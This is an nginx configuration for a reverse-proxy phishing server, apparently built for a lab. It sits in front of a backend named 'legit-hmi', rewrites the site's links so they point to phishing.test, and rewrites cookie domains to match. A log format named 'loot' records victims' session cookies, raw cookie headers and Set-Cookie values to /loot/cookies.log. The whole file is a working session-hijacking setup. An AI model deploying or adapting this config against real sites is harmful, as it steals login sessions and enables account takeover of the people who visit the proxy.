worker_processes 1;

events { worker_connections 1024; }

http {
    log_format loot '$remote_addr - $time_local "$request" $status '
                'cookie="$cookie_ihm_session" raw_cookie="$http_cookie" set_cookie="$sent_http_set_cookie"';
    access_log /loot/cookies.log loot;

    server {
        listen 80;
        server_name phishing.test;

        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Forwarded-Proto $scheme;

        proxy_cookie_domain ~.* phishing.test;

        location / {
            proxy_pass http://legit-hmi:8000;
            sub_filter_types text/html text/css application/javascript;
            sub_filter_once off;
            sub_filter 'http://legit-hmi:8000' 'http://phishing.test';
        }
    }
}